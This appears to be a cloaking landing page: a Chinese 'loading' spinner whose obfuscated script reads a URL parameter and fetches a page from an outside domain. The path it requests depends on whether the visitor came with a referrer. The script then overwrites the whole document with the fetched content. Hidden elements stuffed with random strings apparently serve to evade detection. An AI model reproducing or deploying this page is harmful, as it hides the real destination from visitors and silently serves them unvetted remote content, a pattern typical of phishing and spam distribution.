<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RIEEf1PA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RIEEf1PA .CL3EbBHfcx {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RIEEf1PA .content {
            line-height: 50px;
            text-align: center
        }

        .RIEEf1PA .img {
            width: 100%
        }

        .RIEEf1PA .vUD7HxHI {
            text-align: center
        }

        .RIEEf1PA .vUD7HxHI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RIEEf1PA .vUD7HxHI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RIEEf1PA .vUD7HxHI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RIEEf1PA .vUD7HxHI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RIEEf1PA .vUD7HxHI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RIEEf1PA .vUD7HxHI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RIEEf1PA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function V80zOYeKabS(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var sYpGG = V80zOYeKabS('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ sYpGG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ sYpGG +".html?a=share";
		}
		
        cK0OuPF=url+"#"+new Date().getTime();
        cK0OuPF && function() {
            $.get(cK0OuPF, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Ry1Rpd31k5D9w54wbOeWY3Lb8npdpD6Nc069hOGjIH8eITi3MysgfdVpXdKVOeMeaD</b>
<p  style='display:none'>fxIjfK5UbqkjR5NoMI5TXGnW3HMfi0swzqCo4cXinoYD7RVnExBf6izMIJmYrsOCxzY9KLiCQnW4Pds9jM21oGGNczKu</p>
<span style='display:none'>QCSSMFgVxpJd6xArodKcERNGnJQeIfiuEBMRt</span>
<span style='display:none'>QCSSMFgVxpJd6xArodKcERNGnJQeIfiuEBMRt</span>
<a  href='#' style='display:none'>GFsZpx2GAZ8ucpdhyn8PpcVh3RQYENovkX5SJbZqDEL</a>
<p  style='display:none'>fxIjfK5UbqkjR5NoMI5TXGnW3HMfi0swzqCo4cXinoYD7RVnExBf6izMIJmYrsOCxzY9KLiCQnW4Pds9jM21oGGNczKu</p>
<span style='display:none'>QCSSMFgVxpJd6xArodKcERNGnJQeIfiuEBMRt</span><div class="RIEEf1PA">
    <div class="CL3EbBHfcx">
        <div class="vUD7HxHI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >smJTfx5u4p7X43Z10OFZf164ulry3mrpqTaKQ4dytp1GKUV2eCZX6DgKi0vRgkmWQSwn2iPjFSzjMnYhspjdUQ9MLFlllVrQvKnZ</ul>
<b style='display:none' >XBh1qbGT72D5sKiWIVHvJyCb0XXR5ZsWLVnw5UlGuNqwSbPMaCvnQNwdbG36cw0B0K2vgvS</b>
<h1 style='display:none' >BFlrOqGqbxmxVqNNujRl29BFIvrvZ</h1>
<li style='display:none' >eKwMICEVKfhEg4urUoHCfAtJM4Eih7vHyRQYQmFIYZ1hqt4WbTp21RVpdJFEQGAof04FfMirTHyjKNnNlFH1MOeYga</li>
<ul style='display:none' >smJTfx5u4p7X43Z10OFZf164ulry3mrpqTaKQ4dytp1GKUV2eCZX6DgKi0vRgkmWQSwn2iPjFSzjMnYhspjdUQ9MLFlllVrQvKnZ</ul>
<img  src='' style='display:none'>
<li style='display:none' >eKwMICEVKfhEg4urUoHCfAtJM4Eih7vHyRQYQmFIYZ1hqt4WbTp21RVpdJFEQGAof04FfMirTHyjKNnNlFH1MOeYga</li>
<a  href='#' style='display:none'>dw38arvqXhL3cxBnyVh3ocgWtKtn4</a>
<b style='display:none' >XBh1qbGT72D5sKiWIVHvJyCb0XXR5ZsWLVnw5UlGuNqwSbPMaCvnQNwdbG36cw0B0K2vgvS</b></body>
</html>